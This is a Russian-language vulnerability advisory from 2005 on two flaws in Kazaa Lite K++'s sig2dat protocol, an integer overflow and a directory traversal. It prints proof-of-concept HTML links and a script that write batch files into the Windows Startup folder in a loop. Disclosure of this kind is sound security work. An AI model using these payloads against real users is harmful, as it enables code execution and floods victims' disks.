Целочисленное переполнение в Kazaa Sig2Dat протоколе

Дата публикации:
18.01.2005
Всего просмотров:
1051
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Kazaa lite k++

Описание:
Обнаружено две уязвимости в менеджере пиринговых сетей Kazaa. Удаленный пользователь может вызвать отказ в обслуживании или выполнить произвольный код на уязвимой системе. Удаленный пользователь может создать произвольное количество файлов на текущем разделе.

1. Целочисленное переполнение в протоколе Sig2Dat позволяет вызвать отказ в обслуживании или выполнить произвольный код на уязвимой системе. Уязвимость существует в параметре Length в байтах. Удаленный пользователь может передать значение превышающее 999999999 и вызвать переполнение целочисленных. Удачная эксплуатация уязвимости позволит выполнить произвольный код на целевой системе. Пример:

<A HREF="sig2dat://%7CFile:dev-catz5%28.bin%7CLength:999999999999999999999999999%20Bytes,364489KB%7CUUHash:=
DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/">CLICK
HERE</A>

2. Уязвимость в параметре File позволяет выйти за пределы директории и создать файл в любом месте раздела используя символы перехода между каталогами (‘../’). Примеры:

<A HREF="sig2dat://%7CFile:../../../../../../Docume~1/All Users/Start Menu/Programs/Startup/cool.bat%7CLength: 373236528%20Bytes,364489KB%7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ =%7C/">CLICK HERE</A>

<script>
var i
for (i=1;i<10000;i++)
{
mylocation="<iframe src='sig2dat://% CFile:../../../../../../Docume~1/All Users /StartMenu/Programs/Startup/cool"+i+".bat %7CLength:373236528%20Bytes, 364489KB% 7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/'></iframe>";
document.write(mylocation);
}
</script>

URL производителя: http://www.kazaa.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Sig2Dat Protocol Remote Integer Overflow and Denial Of Service by creating files in arbitrary

или введите имя

CAPTCHA